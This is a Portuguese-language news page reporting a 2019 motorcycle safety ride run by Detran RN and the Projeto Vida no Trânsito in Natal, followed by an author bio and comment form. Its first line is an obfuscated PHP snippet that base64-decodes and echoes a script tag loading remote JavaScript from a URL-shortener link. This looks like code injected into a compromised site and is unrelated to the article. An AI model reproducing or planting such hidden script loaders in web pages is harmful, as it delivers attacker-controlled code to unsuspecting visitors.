$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Detran e Projeto Vida no Trânsito comemoram o Dia do Motociclista com passeio

Detran e Projeto Vida no Trânsito comemoram o Dia do Motociclista com passeio
29 Jul 2019

O Dia do Motociclista foi comemorado pelo Departamento Estadual de Trânsito do RN (Detran) e pelas instituições que fazem parte do Projeto Vida no Trânsito com um passeio motociclístico, que saiu do bairro de Ponta Negra e percorreu várias ruas da cidade, sendo finalizado na Praia do Meio.

O momento reuniu dezenas de motociclistas que chamaram a atenção da população sobre a importância de conduzir o veículo de duas rodas com prudência, praticando a direção defensiva e obedecendo as normas de segurança viária. Na oportunidade, a equipe de educação para o trânsito do Detran fez diversas abordagens distribuindo brindes, adesivos e material informativo direcionado a conscientização do motociclista no tráfego.

Informações a exemplo do uso do capacete e sapatos ao pilotar, utilização da antena corta-pipa, ultrapassagem perigosa, e o uso inadequado do celular na motocicleta em movimento foram itens reforçados junto aos motociclistas pela equipe de educação de trânsito do Detran.

A ação contou ainda com a participação da Turma Teatro Educativo (TTT) do Detran, que animou a mobilização juntamente com um DJ que finalizou o evento com música e descontração em som montado na área da Praia do Meio. O percurso pelas ruas da cidade teve o apoio dos batedores do Comando de Policiamento Rodoviário Estadual (CPRE) e da Secretaria de Mobilidade Urbana (STTU).

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *